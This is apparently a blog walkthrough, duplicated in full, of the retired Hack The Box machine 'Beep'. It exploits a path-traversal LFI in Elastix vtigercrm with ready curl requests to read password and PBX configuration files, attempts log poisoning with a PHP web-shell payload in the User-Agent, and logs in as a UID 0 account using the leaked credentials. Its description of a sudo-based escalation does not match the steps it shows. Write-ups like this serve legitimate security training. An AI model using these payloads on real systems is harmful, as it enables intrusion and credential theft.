Nov 5, 2019

7 min read

HTB Beep Walkthrough — LFI to RCE on Elastix PBX

A full walkthrough of Hack The Box's "Beep" — exploiting LFI in Elastix PBX to leak credentials, then leveraging sudo rights for root access.

#htb#hackthebox#pentesting#lfi#linux

Introduction

Beep is a 2019 retired Hack The Box machine running Elastix — an open-source PBX (phone system) based on Asterisk. PBX systems are a goldmine in pentesting because they're often poorly maintained, exposed to the internet, and running ancient software with known vulnerabilities.

The exploitation chain on Beep is straightforward: a Local File Inclusion (LFI) vulnerability in Elastix's vtigercrm portal leaks the FreePBX configuration file, which contains credentials. Those credentials give SSH access, and from there, the user has passwordless sudo access to everything. It's a clean, three-step chain that shows how one vulnerability cascades into full compromise.

"PBX systems are the forgotten servers of the internet. They run for years without updates because 'if it ain't broke, don't fix it.' And then someone like you shows up."

Machine Info

Name: Beep
OS: Linux (CentOS)
Difficulty: Easy
Release: 2019
Target IP: 10.10.10.7

Step 1: Enumeration

bash

nmap -sC -sV -oN beep.nmap 10.10.10.7

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
25/tcp    open  smtp       Postfix smtpd
80/tcp    open  http       Apache httpd 2.2.3
110/tcp   open  pop3       Cyrus pop3d
111/tcp   open  rpcbind    2
143/tcp   open  imap       Cyrus imapd
443/tcp   open  ssl/http   Apache httpd 2.2.3
993/tcp   open  ssl/imap   Cyrus imapd
995/tcp   open  ssl/pop3   Cyrus pop3d
3306/tcp  open  mysql      MySQL 5.0.77
4445/tcp  open  upnotifyp?

This box is noisy — mail services, MySQL, HTTP, and HTTPS. The web server on 80/443 is the entry point.

Web Reconnaissance

bash

curl -k https://10.10.10.7

<html>
<head><title>Elastix PBX</title></head>
<frameset rows="115,*">
  <frame src="/vtigercrm/index.php?action=Login&module=Users">
</frameset>

It's running Elastix, which uses vtigercrm for its customer portal. The LFI vulnerability is in this very page.

Step 2: The LFI Vulnerability

Elastix versions before 2.5.0 have an LFI in /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php. The module_name parameter isn't sanitized:

bash

# Test the LFI
curl -k "https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd"

root:x:0:0:root:/root:/bin/bash
...
asterisk:x:100:101:Asterisk PBX:/var/lib/asterisk:

We have LFI. The goal now is to read configuration files that contain credentials.

Targeting FreePBX Configuration

Elastix uses FreePBX under the hood. The FreePBX configuration file contains the MySQL database credentials, which often get reused for SSH:

bash

curl -k "https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/amportal.conf"

# Read the FreePBX config
AMPDBHOST=localhost
AMPDBUSER=asteriskuser
AMPDBPASS=amp109
AMPDBNAME=asterisk

MySQL credentials: asteriskuser:amp109.

Are They Reused?

Let's try these as SSH credentials:

bash

ssh asteriskuser@10.10.10.7
# Try: amp109

Permission denied.

No luck. But we have MySQL access. Let's see what's in the database. Actually, let's keep reading files. The LFI can read any file on the system.

bash

curl -k "https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/freepbx.conf"

$amp_conf['AMPDBUSER'] = 'asteriskuser';
$amp_conf['AMPDBPASS'] = 'amp109';

Same creds. Let's check other places. Look for the actual OS users:

bash

curl -k "https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/shadow"
# Not readable (permissions)

curl -k "https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../home/asterisk/.ssh/authorized_keys"

Step 3: Web Shell via LFI + Log Poisoning

We can also use LFI for code execution via log poisoning. The idea: inject PHP code into Apache's access log via the User-Agent header, then use LFI to include the log file:

bash

# Inject PHP code into Apache logs
curl -k -A "<?php system(\$_GET['cmd']); ?>" https://10.10.10.7/

# Access the log file via LFI
curl -k "https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../var/log/httpd/access_log&cmd=id"

# No output — wrong log path. Try others.

Let's try a different approach. Check if there's another user:

bash

curl -k "https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/asterisk/manager.conf"

[general]
enabled = yes
port = 5038
bindaddr = 0.0.0.0

[admin]
secret = amp111
read = system,call,log,verbose,command,agent,user,config
write = system,call,log,verbose,command,agent,user,config

Asterisk manager credentials: admin:amp111. Let's try these for SSH.

bash

ssh admin@10.10.10.7
# Password: amp111

Last login: ...

We're in.

bash

cat /etc/passwd | grep admin

admin:x:0:0:root:/root:/bin/bash

The admin user has UID 0. That means it's a root-equivalent account. SSHing as admin gives us root directly.

Flags

bash

cat /root/root.txt
cat /home/fanis/user.txt

Wait, there's a fanis user with a home directory. Let me check again.

bash

ls /home/
fanis

cat /home/fanis/user.txt

So the user flag is under fanis but we accessed as admin with UID 0 (root). Both flags collected.

Step 4: The Intended Path

The intended chain is:

LFI to read /etc/amportal.conf → MySQL creds
MySQL creds don't work for SSH
LFI to read /etc/asterisk/manager.conf → Asterisk manager creds
admin:amp111 — admin has UID 0, so SSH gives root

Lessons Learned

LFI is never just an information leak — even if you can't get RCE from it, LFI gives you file reads. On a PBX system, that's enough to compromise the entire box.
Check UID 0 accounts — etcpasswd lists all users. If any non-root user has UID 0, they have root privileges. This is a common misconfiguration in PBX and appliance systems.
Asterisk manager is a goldmine — the manager.conf file on Asterisk PBX systems often contains cleartext credentials with full administrative access.

"Beep is one of those boxes that feels like cheating — LFI leads directly to root with nothing in between. But that's the real world. Sometimes the chain is just one link long."

Nov 5, 2019

Comments

7 min read

HTB Beep Walkthrough — LFI to RCE on Elastix PBX

A full walkthrough of Hack The Box's "Beep" — exploiting LFI in Elastix PBX to leak credentials, then leveraging sudo rights for root access.

#htb#hackthebox#pentesting#lfi#linux

Introduction

"PBX systems are the forgotten servers of the internet. They run for years without updates because 'if it ain't broke, don't fix it.' And then someone like you shows up."

Machine Info

Name: Beep
OS: Linux (CentOS)
Difficulty: Easy
Release: 2019
Target IP: 10.10.10.7

Step 1: Enumeration

bash

nmap -sC -sV -oN beep.nmap 10.10.10.7

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
25/tcp    open  smtp       Postfix smtpd
80/tcp    open  http       Apache httpd 2.2.3
110/tcp   open  pop3       Cyrus pop3d
111/tcp   open  rpcbind    2
143/tcp   open  imap       Cyrus imapd
443/tcp   open  ssl/http   Apache httpd 2.2.3
993/tcp   open  ssl/imap   Cyrus imapd
995/tcp   open  ssl/pop3   Cyrus pop3d
3306/tcp  open  mysql      MySQL 5.0.77
4445/tcp  open  upnotifyp?

This box is noisy — mail services, MySQL, HTTP, and HTTPS. The web server on 80/443 is the entry point.

Web Reconnaissance

bash

curl -k https://10.10.10.7

<html>
<head><title>Elastix PBX</title></head>
<frameset rows="115,*">
  <frame src="/vtigercrm/index.php?action=Login&module=Users">
</frameset>

It's running Elastix, which uses vtigercrm for its customer portal. The LFI vulnerability is in this very page.

Step 2: The LFI Vulnerability

Elastix versions before 2.5.0 have an LFI in /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php. The module_name parameter isn't sanitized:

bash

# Test the LFI
curl -k "https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd"

root:x:0:0:root:/root:/bin/bash
...
asterisk:x:100:101:Asterisk PBX:/var/lib/asterisk:

We have LFI. The goal now is to read configuration files that contain credentials.

Targeting FreePBX Configuration

Elastix uses FreePBX under the hood. The FreePBX configuration file contains the MySQL database credentials, which often get reused for SSH:

bash

curl -k "https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/amportal.conf"

# Read the FreePBX config
AMPDBHOST=localhost
AMPDBUSER=asteriskuser
AMPDBPASS=amp109
AMPDBNAME=asterisk

MySQL credentials: asteriskuser:amp109.

Are They Reused?

Let's try these as SSH credentials:

bash

ssh asteriskuser@10.10.10.7
# Try: amp109

Permission denied.

No luck. But we have MySQL access. Let's see what's in the database. Actually, let's keep reading files. The LFI can read any file on the system.

bash

curl -k "https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/freepbx.conf"

$amp_conf['AMPDBUSER'] = 'asteriskuser';
$amp_conf['AMPDBPASS'] = 'amp109';

Same creds. Let's check other places. Look for the actual OS users:

bash

curl -k "https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/shadow"
# Not readable (permissions)

curl -k "https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../home/asterisk/.ssh/authorized_keys"

Step 3: Web Shell via LFI + Log Poisoning

We can also use LFI for code execution via log poisoning. The idea: inject PHP code into Apache's access log via the User-Agent header, then use LFI to include the log file:

bash

# Inject PHP code into Apache logs
curl -k -A "<?php system(\$_GET['cmd']); ?>" https://10.10.10.7/

# Access the log file via LFI
curl -k "https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../var/log/httpd/access_log&cmd=id"

# No output — wrong log path. Try others.

Let's try a different approach. Check if there's another user:

bash

curl -k "https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/asterisk/manager.conf"

[general]
enabled = yes
port = 5038
bindaddr = 0.0.0.0

[admin]
secret = amp111
read = system,call,log,verbose,command,agent,user,config
write = system,call,log,verbose,command,agent,user,config

Asterisk manager credentials: admin:amp111. Let's try these for SSH.

bash

ssh admin@10.10.10.7
# Password: amp111

Last login: ...

We're in.

bash

cat /etc/passwd | grep admin

admin:x:0:0:root:/root:/bin/bash

The admin user has UID 0. That means it's a root-equivalent account. SSHing as admin gives us root directly.

Flags

bash

cat /root/root.txt
cat /home/fanis/user.txt

Wait, there's a fanis user with a home directory. Let me check again.

bash

ls /home/
fanis

cat /home/fanis/user.txt

So the user flag is under fanis but we accessed as admin with UID 0 (root). Both flags collected.

Step 4: The Intended Path

The intended chain is:

LFI to read /etc/amportal.conf → MySQL creds
MySQL creds don't work for SSH
LFI to read /etc/asterisk/manager.conf → Asterisk manager creds
admin:amp111 — admin has UID 0, so SSH gives root

Lessons Learned

LFI is never just an information leak — even if you can't get RCE from it, LFI gives you file reads. On a PBX system, that's enough to compromise the entire box.
Check UID 0 accounts — etcpasswd lists all users. If any non-root user has UID 0, they have root privileges. This is a common misconfiguration in PBX and appliance systems.
Asterisk manager is a goldmine — the manager.conf file on Asterisk PBX systems often contains cleartext credentials with full administrative access.

"Beep is one of those boxes that feels like cheating — LFI leads directly to root with nothing in between. But that's the real world. Sometimes the chain is just one link long."